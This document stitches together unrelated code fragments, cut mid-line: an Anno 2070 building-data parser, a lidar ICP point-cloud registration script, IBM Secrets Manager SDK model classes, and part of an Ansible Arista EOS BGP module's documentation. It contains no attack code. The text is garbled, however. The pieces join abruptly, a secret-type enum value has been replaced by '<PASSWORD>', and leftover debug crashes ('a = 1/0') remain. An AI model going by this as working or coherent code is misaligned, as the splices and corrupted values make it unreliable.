model_url = "http://aprilboy.e404.sk/anno2070/" + model_name
def get_building_list():
AssetGroups = ET.parse(assets_path).findall(".//Group")
IconFileNames = parse_IconFileNames()
IconWikiaFiles = parse_IconWikiaFiles()
Eng1 = parse_Eng1()
ProductGUIDs = parse_ProductGUIDs()
BaseGoldPrices = parse_BaseGoldPrices()
Unlocks = parse_Unlocks()
buildings = []
for top_group in AssetGroups:
if top_group.find("Name").text == "Buildings":
break
for faction in top_group.findall("Groups/Group"):
faction_name = faction.find("Name").text
for group in faction.findall(".//Groups/Group"):
group_name = group.find("Name").text
if group_name == "farmfield":
group_name = "farmfields"
for asset in group.findall("Assets/Asset"):
try:
template = asset.find("Template").text
if template == "SimpleObject": # SimpleObjects (farm_field_rows and pirates_props) won't be needed in this database
continue
except: # scientist_academy does not have a Template, so let's ignore it ...
continue
GUID = int(asset.find("Values/Standard/GUID").text)
Name = asset.find("Values/Standard/Name").text
b = {"GUID": GUID, "Name": Name}
try: b["Eng1"] = Eng1[GUID]
except: pass
try: b["IconFileName"] = IconFileNames[GUID]
except: pass
try: b["IconWikiaFile"] = IconWikiaFiles[Name]
except: pass
try: b["Faction"] = faction_name
except: pass
try: b["Group"] = group_name
except: pass
try: b["Template"] = template
except: pass
try: b["InfluenceRadius"] = int(asset.find("Values/Influence/InfluenceRadius").text)
except: pass
try: b[".ifo"] = asset.find("Values/Object/Variations/Item/Filename").text.replace(".cfg",".ifo").replace("data\\graphics\\buildings\\", "")
except: pass
try: b["MaxResidentCount"] = int(asset.find("Values/ResidenceBuilding/MaxResidentCount").text)
except: pass
try:
(x, z) = get_BuildBlocker( b[".ifo"] )
b["BuildBlocker.x"] = x
b["BuildBlocker.z"] = z
except: pass
try:
b["FarmField.GUID"] = int(asset.find("Values/Farm/FarmFieldGUID").text)
try: b["FarmField.Count"] = int(asset.find("Values/Farm/FarmfieldCount").text)
except: pass
try: b["FarmField.Fertility"] = asset.find("Values/Farm/Fertility").text
except: pass
try:
# this split and join is to add "_field" to the .ifo filename
farmifo = b[".ifo"].split("\\")
for i in range(-2,0):
f = farmifo[i].split("_")
farmifo[i] = "_".join(f[0:-1] + ["field"] + [f[-1]])
farmifo = "\\".join(farmifo).replace("tycoon.ifo", "tycoons.ifo") # tycoon do not have consistend .ifo filenames for fields
(x, z) = get_BuildBlocker( farmifo )
b["FarmField.BuildBlocker.x"] = x
b["FarmField.BuildBlocker.z"] = z
except: pass
except: pass
try:
b["Production.Product.Name"] = asset.find("Values/WareProduction/Product").text
#default values:
b["Production.ProductionTime"] = 20000 #miliseconds
b["Production.ProductionCount"] = 1000 #kilograms
b["Production.RawNeeded1"] = 1000
b["Production.RawNeeded2"] = 1000
try: b["Production.Product.GUID"] = ProductGUIDs[ b["Production.Product.Name"] ]
except: pass
try: b["Production.Product.BaseGoldPrice"] = BaseGoldPrices[ b["Production.Product.Name"] ]
except: pass
try: b["Production.Product.Eng1"] = Eng1[ b["Production.Product.GUID"] ]
except: pass
try: b["Production.ProductionTime"] = int(asset.find("Values/WareProduction/ProductionTime").text)
except: pass
try: b["Production.ProductionCount"] = int(asset.find("Values/WareProduction/ProductionCount").text)
except: pass
try: b["Production.RawMaterial1"] = asset.find("Values/Factory/RawMaterial1").text
except: del b["Production.RawNeeded1"]
try: b["Production.RawMaterial2"] = asset.find("Values/Factory/RawMaterial2").text
except: del b["Production.RawNeeded2"]
try: b["Production.RawNeeded1"] = int(asset.find("Values/Factory/RawNeeded1").text)
except: pass
try: b["Production.RawNeeded2"] = int(asset.find("Values/Factory/RawNeeded2").text)
except: pass
TicksPerMinute = 60000 / b["Production.ProductionTime"]
b["Production.ProductionTonsPerMinute"] = ( b["Production.ProductionCount"] / 1000 ) * TicksPerMinute
try: b["Production.RawNeeded1TonsPerMinute"] = ( b["Production.RawNeeded1"] / 1000 ) * b["Production.ProductionTonsPerMinute"]
except: pass
try: b["Production.RawNeeded2TonsPerMinute"] = ( b["Production.RawNeeded2"] / 1000 ) * b["Production.ProductionTonsPerMinute"]
except: pass
except: pass
try:
for cost in asset.findall("Values/BuildCost/*/*"):
try:
if cost.tag == "Credits":
b["BuildCost." + cost.tag] = int(cost.text)
else:
b["BuildCost." + cost.tag] = int(cost.text) // 1000 # in tons
except: pass
except: pass
try:
for cost in asset.findall("Values/MaintenanceCost/*"):
try:
c = int(cost.text)
if "Cost" in cost.tag:
c = -c
if c % (2 << 10):
b["MaintenanceCost." + cost.tag] = c # in Credits
else:
b["MaintenanceCost." + cost.tag] = c >> 12 # in game eco / power / ... units
except: pass
except: pass
try:
b["Unlock.IntermediateLevel"] = asset.find("Values/BuildCost/NeedsIntermediatelevel").text
(count, level) = Unlocks[ b["Unlock.IntermediateLevel"] ]
b["Unlock.ResidentCount"] = count
b["Unlock.ResidentLevel"] = level
except: pass
buildings.append(b)
return buildings
#===============================================================================
def parse_Eng1():
Eng1 = {}
for line in open(icons_txt_path):
result = re.search("(\\d*)=(.*)", line)
if result:
Eng1[int(result.group(1))] = result.group(2)
for line in open(guids_txt_path):
result = re.search("(\\d*)=(.*)", line)
if result:
Eng1[int(result.group(1))] = result.group(2)
return Eng1
def parse_ProductGUIDs():
ProductGUIDs = {}
for p in ET.parse(properties_path).findall(".//ProductIconGUID/*"):
if p.tag != "icon":
ProductGUIDs[p.tag] = int(p.find("icon").text)
return ProductGUIDs
def parse_BaseGoldPrices():
BaseGoldPrices = {}
for p in ET.parse(properties_path).findall(".//ProductPrices/*"):
try:
BaseGoldPrices[p.tag] = int(int(p.find("BaseGoldPrice").text) * 2.5)
except: pass
return BaseGoldPrices
def parse_IconFileNames():
prefix = "icon_"
midfix = "_"
postfix = ".png"
IconFileNames = {}
for i in ET.parse(icons_path).findall("i"):
IconFileID = i.find("Icons/i/IconFileID").text
try:
IconIndex = i.find("Icons/i/IconIndex").text
except:
IconIndex = "0"
IconFileNames[int(i.find("GUID").text)] = prefix + IconFileID + midfix + IconIndex + postfix
return IconFileNames
def parse_IconWikiaFiles():
IconWikiaFiles = {}
with open(IconWikiaFiles_path) as f:
f.readline() # first line contains headers
for line in f:
(key, value) = line.strip().replace("\"","").split(";")[0:2]
IconWikiaFiles[key] = value
return IconWikiaFiles
def parse_IconWikiaFilesSource():
buildings = get_building_list()
WikiaCSVString = "Name;Wikia Icon File;Wikia Label\n"
def prep(string):
return re.sub("[ ._-]*", "", string.lower())
with open(IconWikiaFilessource_path) as f:
for line in f:
if ".png" in line and "File:" not in line:
try:
(png, label) = line.strip().replace(";","").split("|")[0:2]
except:
(png, label) = (line.strip().replace(";","").split("|")[0], "")
name = ""
for b in buildings:
names = [ prep(b["Name"]) ]
try: names.append(prep(b["Eng1"]))
except: pass
try: names.append(prep(b["IconWikiaFile"]))
except: pass
try: names.append(prep(b["Production.Product.Name"]))
except: pass
try: names.append(prep(b["Production.Product.Eng1"]))
except: pass
try: names.append(prep(b["IconFileName"]))
except: pass
if prep(label) in names or prep(png.split(".")[0]) in names:
name = b["Name"]
break
WikiaCSVString += "{0};{1};{2}\n".format(name, png, label)
return WikiaCSVString
def update_IconWikiaFiles():
pass # manually for now ...
def get_BuildBlocker(detail_path):
ifo_path = folder + "data2\\graphics\\buildings\\" + detail_path
b = ET.parse(ifo_path).find(".//BuildBlocker/Position")
x = abs(int(b.find("x").text)) >> 11
z = abs(int(b.find("z").text)) >> 11
return [x, z]
def parse_Unlocks():
Unlocks = {}
for p in ET.parse(properties_path).findall(".//SortedLevels")[1].getchildren():
for i in p.findall("levels/Item"):
try: Unlocks[i.find("IntermediateLevel").text] = ( int(i.find("ResidentCount").text), p.tag )
except: pass
return Unlocks
#===============================================================================
def validate(buildings, model):
valid_keys = model.keys()
result = set()
for b in buildings:
for k in b.keys():
if k not in valid_keys:
result.add("\"{0}\": \"\",".format(k))
break
t = model[k].split(":")[0]
if t not in ("text", "int", "float", "int(+/-)", "float(+/-)"):
result.add("unknown type <{0}> for key: {1}".format(t, k))
elif t == "text" and not isinstance(b[k], str) or t[:3] == "int" and not isinstance(b[k], int) or t[:3] == "float" and not isinstance(b[k], float):
result.add("{0} should be <{1}> type, but for b[\"Name\"] = {2} the value is: {3}".format(k, t, b["Name"], b[k]))
if result:
text_result = "Invalid keys not found in model:\n\n"
for r in result:
text_result += r + "\n"
else:
text_result = "ok"
return text_result
def out_json(buildings, model):
json.dump(model,
fp=open(folder + model_name, "w"),
indent=2,
sort_keys=True)
json.dump({"_version": __version__,
"_model": model_url,
"buildings": buildings},
fp=open(folder + output_name, "w"),
indent=2,
sort_keys=True)
return None
def out_csv(objects, model, object_type):
csv = "This is a csv dump for anno data version {0}, see model {1} ...\n".format(__version__, model_url,)
csv += "To calculate with the data in spreadsheet formulas, try something like the following instead of fixed ranges (order of columns might change in future versions):\n"
csv += "\" =INDEX(data_range;MATCH($A2;OFFSET(data_first_column;0;MATCH('Eng1';data_headers;0)-1);0);MATCH(B$1;data_headers;0))\"\n\n"
headers = sorted(model[object_type].keys())
for h in headers:
csv += "{0};".format(h)
csv += "\n"
for b in objects:
for h in headers:
try: temp = b[h]
except: temp = ""
csv += "{0};".format(temp)
csv += "\n"
with open(folder + output_name.replace(".json", "_{0}.csv".format(object_type)), "w") as f:
f.write(csv)
return None
#===============================================================================
def main():
model = {"_description": "this is a list of Anno 2070 buildings with properties that help fan-made tools in there .. i tried to name the properties somewhat close to actual xml elements in game data files .. you can contact me on http://anno2070.wikia.com/wiki/User:DeathApril or <EMAIL>",
"_version": __version__,
"_gameversion": "v1.02 (patch3.rda)",
"_missing_keys": "not all objects use all the keys in this model, please check for KeyError exceptions before working with them (e.g. Production.RawNeeded2Material will be missing for factories with 1 input only)",
"_changelog": {"0.3": ["2011-12-17",
"IconFileName changed, the second number corresponds to IconIndexdo without added +1 (for icons numbered from 0 instead from 1)",
"IconWikiaFile added",
"Production.Product.BaseGoldPrice added (in default trade price, not in datafile format)",
"FarmField.BuildBlocker.* added (for convenience)",
"BuildCost.* added",
"MaintananceCost.* added",
"Unlock.* added"
],
"0.2": ["2011-12-15",
"BuildBlocker array of 2 ints split to 2 properties *.x and *.z (so .csv dump of could be 1:1 to JSON)",
"ProductName, ProductGUID and ProductEng1 renamed to Production.Product.* (for naming consistency)",
"MaxResidentCount, Faction and Group added",
"FarmField.* added + the farmfields themselves can be found in the buildings array by GUID (for farm size)",
"Production.* added"
]
},
"buildings": {"GUID": "int: GUID as appears in assets.xml and other | |
np.meshgrid(coords, coords)
sq_r = x ** 2 + y ** 2
elif dimension == 3:
x, y, z = np.meshgrid(coords, coords, coords)
sq_r = x ** 2 + y ** 2 + z ** 2
elif dimension == 4:
x, y, z, t = np.meshgrid(coords, coords, coords, coords)
sq_r = x ** 2 + y ** 2 + z ** 2 + t ** 2
else:
raise ValueError('Unsupported dimension (max is 4)')
return torch.exp(-torch.from_numpy(sq_r.astype(np.float32)) / (2 * sig ** 2 + eps))
def normal_filtering(normals, debug=False):
# Discretise the sphere in carthesian coordiantes to avoid the pole reolution problem
voxel_size = 0.05
# Compute voxel indice for each point
grid_indices = (np.floor(normals / voxel_size)).astype(int)
# Limits of the grid
min_grid_indices = np.amin(grid_indices, axis=0)
max_grid_indices = np.amax(grid_indices, axis=0)
# Number of cells in each direction
deltaX, deltaY, deltaZ = max_grid_indices - min_grid_indices + 1
# Relocate indices
grid_indices -= min_grid_indices
# Scalar equivalent to grid indices
scalar_indices = grid_indices[:, 0] + grid_indices[:, 1] * deltaX + grid_indices[:, 2] * deltaX * deltaY
unique_inds, inverse, counts = np.unique(scalar_indices, return_counts=True, return_inverse=True)
# Get counts in a 3D matrix
unique_z = unique_inds // (deltaX * deltaY)
unique_inds -= unique_z * deltaX * deltaY
unique_y = unique_inds // deltaX
unique_x = unique_inds - unique_y * deltaX
count_matrix = np.zeros((deltaX, deltaY, deltaZ), dtype=np.float32)
count_matrix[unique_x, unique_y, unique_z] += counts
# Smooth them with a gaussian filter convolution
torch_conv = torch.nn.Conv3d(1, 1, kernel_size=5, stride=1, bias=False)
torch_conv.weight.requires_grad_(False)
torch_conv.weight *= 0
torch_conv.weight += gaussian_conv_filter(3, 5)
torch_conv.weight *= torch.sum(torch_conv.weight) ** -1
count_matrix = np.expand_dims(count_matrix, 0)
count_matrix = np.expand_dims(count_matrix, 0)
torch_count = torch.from_numpy(count_matrix)
torch_count = torch.nn.functional.pad(torch_count, [2, 2, 2, 2, 2, 2])
smooth_counts = torch.squeeze(torch_conv(torch_count))
smooth_counts = smooth_counts.numpy()[unique_x, unique_y, unique_z]
#################################################
# Create weight according to the normal direction
#################################################
# Only 20% of the normals bins are kept For the rest, we use weights based on ditances
weights = (smooth_counts > np.percentile(smooth_counts, 80)).astype(np.float32)
# Show histogram in a spherical point cloud
if debug:
n_cloud = np.vstack((unique_x, unique_y, unique_z)).astype(np.float32).T
n_cloud = (n_cloud + min_grid_indices.astype(np.float32) + 0.5) * voxel_size
#n_cloud = n_cloud / np.linalg.norm(n_cloud, axis=1, keepdims=True)
write_ply('nnn_NORMAL_HIST.ply',
[n_cloud, smooth_counts],
['x', 'y', 'z', 'counts'])
a = 1/0
return weights[inverse]
def load_gt_poses(gt_path, only_day_1=False):
gt_files = np.sort([gt_f for gt_f in listdir(gt_path) if gt_f[-4:] == '.csv'])
gt_H = []
gt_t = []
for d, gt_f in enumerate(gt_files):
t1 = time.time()
gt_pkl_file = join(gt_path, gt_f[:-4] + '.pkl')
if exists(gt_pkl_file):
# Read pkl
with open(gt_pkl_file, 'rb') as f:
day_gt_t, day_gt_H = pickle.load(f)
else:
# File paths
gt_csv = join(gt_path, gt_f)
# Load gt
gt = np.loadtxt(gt_csv, delimiter=',')
# Convert gt to homogenous rotation/translation matrix
day_gt_t = gt[:, 0]
day_gt_H = ssc_to_homo(gt[:, 1:])
# Save pickle
with open(gt_pkl_file, 'wb') as f:
pickle.dump([day_gt_t, day_gt_H], f)
t2 = time.time()
print('{:s} {:d}/{:d} Done in {:.1f}s'.format(gt_f, d, gt_files.shape[0], t2 - t1))
gt_t += [day_gt_t]
gt_H += [day_gt_H]
if only_day_1 and d > -1:
break
return gt_t, gt_H
def get_area_frames(days, gt_t, gt_H, raw_path, area_center, area_radius, only_day_1=False):
# Loop on days
day_f_times = []
for d, day in enumerate(days):
# Get frame timestamps
frames_folder = join(raw_path, day)
f_times = np.sort([float(f[:-4]) for f in listdir(frames_folder) if f[-4:] == '.ply'])
# Ground truth does not cover all frames
day_min_t = gt_t[d][0]
day_max_t = gt_t[d][-1]
f_t_bool = np.logical_and(f_times > day_min_t, f_times < day_max_t)
f_times = f_times[f_t_bool]
# Interpolation gt poses to frame timestamps
interp = scipy.interpolate.interp1d(gt_t[d], gt_H[d], kind='nearest', axis=0)
frame_poses = interp(f_times)
# Closest frame to picked point
closest_i = 0
closest_d = 1e6
new_f_times = []
for f_i, f_t in enumerate(f_times):
# GT pose
H = frame_poses[f_i].astype(np.float32)
# Focus check
f_dist = np.linalg.norm(H[:3, 3] - area_center)
if f_dist > area_radius:
continue
# Save closest frame
if (f_dist < closest_d):
closest_d = f_dist
closest_i = len(new_f_times)
# Append frame to candidates
new_f_times.append(f_t)
# Filter to only get subsequent frames
new_f_times = np.array(new_f_times, dtype=np.float64)
gaps = new_f_times[1:] - new_f_times[:-1]
med_gap = np.median(gaps[:50])
jumps = np.sort(np.where(gaps > 5 * med_gap)[0])
i0 = 0
i1 = len(new_f_times)
for j in jumps:
if j + 1 < closest_i:
i0 = j + 1
for j in jumps[::-1]:
if j + 1 > closest_i:
i1 = j + 1
day_f_times.append(new_f_times[i0:i1])
if only_day_1 and d > -1:
break
return day_f_times
def test_icp_registration():
"""
Test ICP registration Use GT to extract a small interesting region.
"""
############
# Parameters
############
# In files
data_path = '../../Data/NCLT'
gt_folder = 'ground_truth'
cov_folder = 'ground_truth_cov'
# Transformation from body to velodyne frame (from NCLT paper)
x_body_velo = np.array([0.002, -0.004, -0.957, 0.807, 0.166, -90.703])
H_body_velo = ssc_to_homo(x_body_velo, ssc_in_radians=False)
H_velo_body = np.linalg.inv(H_body_velo)
x_body_lb3 = np.array([0.035, 0.002, -1.23, -179.93, -0.23, 0.50])
H_body_lb3 = ssc_to_homo(x_body_lb3, ssc_in_radians=False)
H_lb3_body = np.linalg.inv(H_body_lb3)
# Out files
out_folder = join(data_path, 'day_ply')
if not exists(out_folder):
makedirs(out_folder)
# Get gt files and days
gt_files = np.sort([gt_f for gt_f in listdir(join(data_path, gt_folder)) if gt_f[-4:] == '.csv'])
cov_files = np.sort([cov_f for cov_f in listdir(join(data_path, cov_folder)) if cov_f[-4:] == '.csv'])
days = [d[:-4].split('_')[1] for d in gt_files]
###############
# Load GT poses
###############
print('\nLoading days groundtruth poses...')
t0 = time.time()
gt_H = []
gt_t = []
for d, gt_f in enumerate(gt_files):
t1 = time.time()
gt_pkl_file = join(data_path, gt_folder, gt_f[:-4] + '.pkl')
if exists(gt_pkl_file):
# Read pkl
with open(gt_pkl_file, 'rb') as f:
day_gt_t, day_gt_H = pickle.load(f)
else:
# File paths
gt_csv = join(data_path, gt_folder, gt_f)
# Load gt
gt = np.loadtxt(gt_csv, delimiter=',')
# Convert gt to homogenous rotation/translation matrix
day_gt_t = gt[:, 0]
day_gt_H = ssc_to_homo(gt[:, 1:])
# Save pickle
with open(gt_pkl_file, 'wb') as f:
pickle.dump([day_gt_t, day_gt_H], f)
t2 = time.time()
print('{:s} {:d}/{:d} Done in {:.1f}s'.format(gt_f, d, gt_files.shape[0], t2 - t1))
gt_t += [day_gt_t]
gt_H += [day_gt_H]
if d > -1:
break
t2 = time.time()
print('Done in {:.1f}s\n'.format(t2 - t0))
########################
# Get lidar frames times
########################
# Focus on a particular point
p0 = np.array([-220, -527, 12])
center_radius = 10.0
point_radius = 50.0
print('\nGet timestamps in focused area...')
t0 = time.time()
# Loop on days
day_f_times = []
for d, day in enumerate(days):
day_min_t = gt_t[d][0]
day_max_t = gt_t[d][-1]
frames_folder = join(data_path, 'raw_ply', day)
f_times = np.sort([float(f[:-4]) for f in listdir(frames_folder) if f[-4:] == '.ply'])
# Is this frame in gt
f_t_bool = np.logical_and(f_times > day_min_t, f_times < day_max_t)
f_times = f_times[f_t_bool]
# Interpolation gt poses to frame timestamps
interp = scipy.interpolate.interp1d(gt_t[d], gt_H[d], kind='nearest', axis=0)
frame_poses = interp(f_times)
N = len(f_times)
new_f_times = []
for f_i, f_t in enumerate(f_times):
t1 = time.time()
# GT pose
H = frame_poses[f_i].astype(np.float32)
# Focus check
if np.linalg.norm(H[:3, 3] - p0) > center_radius:
continue
new_f_times.append(f_t)
# DEBUGGGGGG
new_f_times = new_f_times[5:-5]
day_f_times.append(np.array(new_f_times, dtype=np.float64))
if d > -1:
break
t2 = time.time()
print('Done in {:.1f}s\n'.format(t2 - t0))
###########################
# coarse map with pt2pt icp
###########################
for d, day in enumerate(days):
frames_folder = join(data_path, 'raw_ply', day)
N = len(day_f_times[d])
print('Reading', day, ' => ', N, 'files')
# Load first frame as map
last_transform = np.eye(4)
last_cloud = None
threshold = 0.3
score_thresh = 0.99
voxel_size = 0.1
transform_list = []
cloud_list = []
cloud_map = None
full_map = None
full_map_t = None
verbose = 1
t = [time.time()]
for f_i, f_t in enumerate(day_f_times[d]):
#######################
# Load velo point cloud
#######################
t = [time.time()]
# Load frame ply file
f_name = '{:.0f}.ply'.format(f_t)
cloud = o3d.io.read_point_cloud(join(frames_folder, f_name))
t += [time.time()]
# Cloud normals and planarity
scores = estimate_normals_planarity(cloud)
if f_i < 1:
last_cloud = cloud
cloud_map = cloud
continue
t += [time.time()]
# Remove low score for fitting
cloud_down = o3d.geometry.PointCloud()
cloud_down.points = o3d.utility.Vector3dVector(np.asarray(cloud.points)[scores > score_thresh, :])
cloud_down.normals = o3d.utility.Vector3dVector(np.asarray(cloud.normals)[scores > score_thresh, :])
# Downsample target
cloud_down = cloud_down.voxel_down_sample(voxel_size)
# if f_i > 2:
#
# np.asarray(last_cloud.normals).astype(np.float32)
# new_scores = np.ones_like(np.asarray(cloud_down.points).astype(np.float32))[:, 0]
# H, rms = pt2pl_icp(np.asarray(cloud_down.points).astype(np.float32),
# np.asarray(last_cloud.points).astype(np.float32),
# np.asarray(last_cloud.normals).astype(np.float32),
# new_scores,
# n_samples=1000,
# max_pairing_dist=0.2,
# max_iter=10,
# minDiffRMS=0.001)
#
# print(H)
# print(rms)
# a = 1 / 0
t += [time.time()]
# Measure initial ICP metrics
if verbose == 2:
reg_init = o3d.registration.evaluate_registration(cloud_down, last_cloud,
| |
secret
state.
:attr str secret_type: (optional) The secret type.
:attr str crn: (optional) The Cloud Resource Name (CRN) that uniquely identifies
the resource.
:attr datetime creation_date: (optional) The date the secret was created. The
date format follows RFC 3339.
:attr str created_by: (optional) The unique identifier for the entity that
created the secret.
:attr datetime last_update_date: (optional) Updates when any part of the secret
metadata is modified. The date format follows RFC 3339.
:attr int versions_total: (optional) The number of versions the secret has.
:attr datetime expiration_date: (optional) The date the secret material expires.
The date format follows RFC 3339.
You can set an expiration date on supported secret types at their creation. If
you create a secret without specifying an expiration date, the secret does not
expire. The `expiration_date` field is supported for the following secret types:
- `arbitrary`
- `<PASSWORD>`.
"""
def __init__(self,
name: str,
*,
id: str = None,
labels: List[str] = None,
description: str = None,
secret_group_id: str = None,
state: int = None,
state_description: str = None,
secret_type: str = None,
crn: str = None,
creation_date: datetime = None,
created_by: str = None,
last_update_date: datetime = None,
versions_total: int = None,
expiration_date: datetime = None) -> None:
"""
Initialize a ArbitrarySecretMetadata object.
:param str name: A human-readable alias to assign to your secret.
To protect your privacy, do not use personal data, such as your name or
location, as an alias for your secret.
:param List[str] labels: (optional) Labels that you can use to filter for
secrets in your instance.
Up to 30 labels can be created. Labels can be between 2-30 characters,
including spaces. Special characters not permitted include the angled
bracket, comma, colon, ampersand, and vertical pipe character (|).
To protect your privacy, do not use personal data, such as your name or
location, as a label for your secret.
:param str description: (optional) An extended description of your secret.
To protect your privacy, do not use personal data, such as your name or
location, as a description for your secret.
:param datetime expiration_date: (optional) The date the secret material
expires. The date format follows RFC 3339.
You can set an expiration date on supported secret types at their creation.
If you create a secret without specifying an expiration date, the secret
does not expire. The `expiration_date` field is supported for the following
secret types:
- `arbitrary`
- `<PASSWORD>`.
"""
# pylint: disable=super-init-not-called
self.id = id
self.labels = labels
self.name = name
self.description = description
self.secret_group_id = secret_group_id
self.state = state
self.state_description = state_description
self.secret_type = secret_type
self.crn = crn
self.creation_date = creation_date
self.created_by = created_by
self.last_update_date = last_update_date
self.versions_total = versions_total
self.expiration_date = expiration_date
@classmethod
def from_dict(cls, _dict: Dict) -> 'ArbitrarySecretMetadata':
"""Initialize a ArbitrarySecretMetadata object from a json dictionary."""
args = {}
if 'id' in _dict:
args['id'] = _dict.get('id')
if 'labels' in _dict:
args['labels'] = _dict.get('labels')
if 'name' in _dict:
args['name'] = _dict.get('name')
else:
raise ValueError('Required property \'name\' not present in ArbitrarySecretMetadata JSON')
if 'description' in _dict:
args['description'] = _dict.get('description')
if 'secret_group_id' in _dict:
args['secret_group_id'] = _dict.get('secret_group_id')
if 'state' in _dict:
args['state'] = _dict.get('state')
if 'state_description' in _dict:
args['state_description'] = _dict.get('state_description')
if 'secret_type' in _dict:
args['secret_type'] = _dict.get('secret_type')
if 'crn' in _dict:
args['crn'] = _dict.get('crn')
if 'creation_date' in _dict:
args['creation_date'] = string_to_datetime(_dict.get('creation_date'))
if 'created_by' in _dict:
args['created_by'] = _dict.get('created_by')
if 'last_update_date' in _dict:
args['last_update_date'] = string_to_datetime(_dict.get('last_update_date'))
if 'versions_total' in _dict:
args['versions_total'] = _dict.get('versions_total')
if 'expiration_date' in _dict:
args['expiration_date'] = string_to_datetime(_dict.get('expiration_date'))
return cls(**args)
@classmethod
def _from_dict(cls, _dict):
"""Initialize a ArbitrarySecretMetadata object from a json dictionary."""
return cls.from_dict(_dict)
def to_dict(self) -> Dict:
"""Return a json dictionary representing this model."""
_dict = {}
if hasattr(self, 'id') and getattr(self, 'id') is not None:
_dict['id'] = getattr(self, 'id')
if hasattr(self, 'labels') and self.labels is not None:
_dict['labels'] = self.labels
if hasattr(self, 'name') and self.name is not None:
_dict['name'] = self.name
if hasattr(self, 'description') and self.description is not None:
_dict['description'] = self.description
if hasattr(self, 'secret_group_id') and getattr(self, 'secret_group_id') is not None:
_dict['secret_group_id'] = getattr(self, 'secret_group_id')
if hasattr(self, 'state') and getattr(self, 'state') is not None:
_dict['state'] = getattr(self, 'state')
if hasattr(self, 'state_description') and getattr(self, 'state_description') is not None:
_dict['state_description'] = getattr(self, 'state_description')
if hasattr(self, 'secret_type') and getattr(self, 'secret_type') is not None:
_dict['secret_type'] = getattr(self, 'secret_type')
if hasattr(self, 'crn') and getattr(self, 'crn') is not None:
_dict['crn'] = getattr(self, 'crn')
if hasattr(self, 'creation_date') and getattr(self, 'creation_date') is not None:
_dict['creation_date'] = datetime_to_string(getattr(self, 'creation_date'))
if hasattr(self, 'created_by') and getattr(self, 'created_by') is not None:
_dict['created_by'] = getattr(self, 'created_by')
if hasattr(self, 'last_update_date') and getattr(self, 'last_update_date') is not None:
_dict['last_update_date'] = datetime_to_string(getattr(self, 'last_update_date'))
if hasattr(self, 'versions_total') and getattr(self, 'versions_total') is not None:
_dict['versions_total'] = getattr(self, 'versions_total')
if hasattr(self, 'expiration_date') and self.expiration_date is not None:
_dict['expiration_date'] = datetime_to_string(self.expiration_date)
return _dict
def _to_dict(self):
"""Return a json dictionary representing this model."""
return self.to_dict()
def __str__(self) -> str:
"""Return a `str` version of this ArbitrarySecretMetadata object."""
return json.dumps(self.to_dict(), indent=2)
def __eq__(self, other: 'ArbitrarySecretMetadata') -> bool:
"""Return `true` when self and other are equal, false otherwise."""
if not isinstance(other, self.__class__):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other: 'ArbitrarySecretMetadata') -> bool:
"""Return `true` when self and other are not equal, false otherwise."""
return not self == other
class SecretTypeEnum(str, Enum):
"""
The secret type.
"""
ARBITRARY = 'arbitrary'
USERNAME_PASSWORD = '<PASSWORD>'
IAM_CREDENTIALS = 'iam_credentials'
IMPORTED_CERT = 'imported_cert'
PUBLIC_CERT = 'public_cert'
class ArbitrarySecretResource(SecretResource):
"""
Properties that describe a secret.
:attr str id: (optional) The v4 UUID that uniquely identifies the secret.
:attr str name: A human-readable alias to assign to your secret.
To protect your privacy, do not use personal data, such as your name or
location, as an alias for your secret.
:attr str description: (optional) An extended description of your secret.
To protect your privacy, do not use personal data, such as your name or
location, as a description for your secret.
:attr str secret_group_id: (optional) The v4 UUID that uniquely identifies the
secret group to assign to this secret.
If you omit this parameter, your secret is assigned to the `default` secret
group.
:attr List[str] labels: (optional) Labels that you can use to filter for secrets
in your instance.
Up to 30 labels can be created. Labels can be between 2-30 characters, including
spaces. Special characters not permitted include the angled bracket, comma,
colon, ampersand, and vertical pipe character (|).
To protect your privacy, do not use personal data, such as your name or
location, as a label for your secret.
:attr int state: (optional) The secret state based on NIST SP 800-57. States are
integers and correspond to the Pre-activation = 0, Active = 1, Suspended = 2,
Deactivated = 3, and Destroyed = 5 values.
:attr str state_description: (optional) A text representation of the secret
state.
:attr str secret_type: (optional) The secret type.
:attr str crn: (optional) The Cloud Resource Name (CRN) that uniquely identifies
your Secrets Manager resource.
:attr datetime creation_date: (optional) The date the secret was created. The
date format follows RFC 3339.
:attr str created_by: (optional) The unique identifier for the entity that
created the secret.
:attr datetime last_update_date: (optional) Updates when the actual secret is
modified. The date format follows RFC 3339.
:attr int versions_total: (optional) The number of versions that are associated
with a secret.
:attr List[dict] versions: (optional) An array that contains metadata for each
secret version. For more information on the metadata properties, see [Get secret
version metadata](#get-secret-version-metadata).
:attr datetime expiration_date: (optional) The date the secret material expires.
The date format follows RFC 3339.
You can set an expiration date on supported secret types at their creation. If
you create a secret without specifying an expiration date, the secret does not
expire. The `expiration_date` field is supported for the following secret types:
- `arbitrary`
- `<PASSWORD>`.
:attr str payload: (optional) The new secret data to assign to the secret.
| |
Target.
type: str
router_id:
description: Router id.
type: str
shutdown:
description: When True, shut down BGP.
type: bool
timers:
description: Timers.
type: dict
suboptions:
keepalive:
description: Keep Alive Interval in secs.
type: int
holdtime:
description: Hold time in secs.
type: int
ucmp:
description: Configure unequal cost multipathing.
type: dict
suboptions:
fec:
description: Configure UCMP fec utilization threshold.
type: dict
suboptions:
trigger:
description: UCMP fec utilization too high threshold.
type: int
clear:
description: UCMP FEC utilization Clear thresholds.
type: int
link_bandwidth:
description: Configure link-bandwidth propagation delay.
type: dict
suboptions:
mode:
description: UCMP link bandwidth mode
type: str
choices: ['encoding_weighted', 'recursive']
update_delay:
description: Link Bandwidth Advertisement delay.
type: int
mode:
description: UCMP mode.
type: dict
suboptions:
set:
description: If True, ucmp mode is set to 1.
type: bool
nexthops:
description: Value for total number UCMP nexthops.
type: int
update:
description: Configure BGP update generation.
type: dict
suboptions:
wait_for:
description: wait for options before converge or synchronize.
type: str
choices: ['wait_for_convergence', 'wait_install']
batch_size:
description: batch size for FIB route acknowledgements.
type: int
running_config:
description:
- This option is used only with state I(parsed).
- The value of this option should be the output received from the EOS device by
executing the command B(show running-config | section bgp).
- The state I(parsed) reads the configuration from C(running_config) option and
transforms it into Ansible structured data as per the resource module's argspec
and the value is then returned in the I(parsed) key within the result.
type: str
state:
description:
- The state the configuration should be left in.
- State I(purged) removes all the BGP configurations from the
target device. Use caution with this state.('no router bgp <x>')
- State I(deleted) only removes BGP attributes that this modules
manages and does not negate the BGP process completely. Thereby, preserving
address-family related configurations under BGP context.
- Running states I(deleted) and I(replaced) will result in an error if there
are address-family configuration lines present under vrf context that is
is to be removed. Please use the M(arista.eos.eos_bgp_address_family)
